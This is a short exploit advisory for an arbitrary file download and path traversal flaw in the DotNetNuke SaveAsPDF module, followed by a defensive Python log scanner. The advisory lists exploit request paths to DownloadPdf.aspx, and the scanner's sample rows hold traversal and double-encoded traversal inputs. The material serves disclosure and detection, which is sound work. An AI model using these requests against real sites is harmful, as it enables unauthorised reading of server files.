- ####################################################################
- # Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/03/2019
- # Vendor Homepage : bizmodules.net ~ dnnsoftware.com
- # Software Information Links :
- bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
- bizmodules.net/portals/0/downloads/sap.pdf
- # Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
- websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
- texts, pictures and even flash contents.
- ####################################################################
- # Impact :
- ***********
- * DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
- arbitrary files because the application fails to sufficiently sanitize user-supplied input.
- An attacker can exploit this issue to download arbitrary files within the context of the
- web server process and obtain potentially sensitive information. The issue also works as an
- open redirection vulnerability.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- * The software uses external input to construct a pathname that should be within a
- restricted directory, but it does not properly neutralize sequences such as ".." that
- can resolve to a location that is outside of that directory.
- ####################################################################
- # Arbitrary File Download Exploit :
- *******************************
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]
- Note : It can download any random website as a PDF file onto your computer, and
- it downloads system files from DNNSoftware.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
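Added example, not part of the original advisory or of the module's code: a log check that flags requests to the DownloadPdf.aspx handler whose url/Url/file parameter carries ".." segments or points at a host other than the portal. It assumes an IIS W3C log with a #Fields header; the hostname in SITE_HOSTS and the sample log rows are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "/desktopmodules/saveaspdf/downloadpdf.aspx"  # path from the advisory
PARAMS = {"url", "file"}               # advisory shows url, Url and file
SITE_HOSTS = {"portal.example.test"}   # assumption: the portal's own hostnames

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before inspection."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(stem, query):
    """Return sorted findings for one request to the SaveAsPDF handler."""
    if stem.lower() != ENDPOINT:
        return []
    findings = set()
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in PARAMS:
            continue
        value = fully_decode(raw).replace("\\", "/").strip()
        if ".." in value.split("/"):
            findings.add("path-traversal")
        is_url = re.match(r"(?i)^([a-z][a-z0-9+.-]*:)?//", value)
        if is_url and (urlsplit(value).hostname or "") not in SITE_HOSTS:
            findings.add("external-url")
    return sorted(findings)

def scan_iis_log(lines):
    """Return [(client_ip, findings)] for flagged rows of an IIS W3C log."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            found = classify(row.get("cs-uri-stem", ""), row.get("cs-uri-query", ""))
            if found:
                hits.append((row.get("c-ip", "?"), found))
    return hits

H = "/DesktopModules/SaveAsPDF/DownloadPdf.aspx"
SAMPLE_LOG = [  # constructed rows, not real traffic
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    f"2019-03-12 10:00:02 GET {H} url=https://www.example.org 203.0.113.7 200",
    f"2019-03-12 10:00:03 GET {H} Name=1&file=..%2f..%2fsample.txt 203.0.113.9 200",
    f"2019-03-12 10:00:04 GET {H} Name=1&file=%252e%252e%252fsample.txt 203.0.113.11 200",
    f"2019-03-12 10:00:05 GET {H} Name=1&Url=https://portal.example.test/Home.aspx 198.51.100.4 200",
]
for ip, found in scan_iis_log(SAMPLE_LOG):
    print(ip, found)
```

Values are decoded repeatedly before matching so that double-encoded ".." segments are still caught; same-site page URLs pass without a finding.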